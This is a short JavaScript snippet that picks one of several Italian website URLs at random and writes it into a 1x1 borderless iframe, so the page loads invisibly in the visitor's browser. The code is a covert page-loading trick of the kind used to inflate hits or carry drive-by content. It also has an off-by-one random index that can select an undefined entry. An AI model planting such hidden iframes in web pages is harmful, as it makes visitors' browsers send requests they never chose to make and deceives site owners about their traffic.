<!--
var links = new Array(10) 
links[1] = "http://www.calcioinitalia.com/index.html"
links[2] = "http://www.cercain.com/index.html"
links[3] = "http://www.motoit.net/index.asp"
links[4] = "http://www.calcioinitalia.com/index.html"
links[5] = "http://www.cercain.com/index.html"
links[6] = "http://www.motoit.net/index.asp"
links[7] = "http://www.calcioinitalia.com/index.html"
links[8] = "http://www.cercain.com/index.html"
links[9] = "http://www.motoit.net/index.asp"
links[10] = "http://www.calcioinitalia.com/index.html"

var a = 1+Math.round(Math.random()*10)
var i = a 
var piu="<iframe WIDTH=1 HEIGHT=1 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 VSPACE=0 HSPACE=0 src=";
var dest0 = links[i]
var piu2="></iframe>";
var dest= piu + dest0 + piu2;
function populateIframe() {
var ifrm = document.getElementById('myIframe');
ifrm = (ifrm.contentWindow) ? ifrm.contentWindow : (ifrm.contentDocument.document) ? ifrm.contentDocument.document : ifrm.contentDocument;
            ifrm.document.open();
            ifrm.document.write(dest);
            ifrm.document.close();
        }
//-->
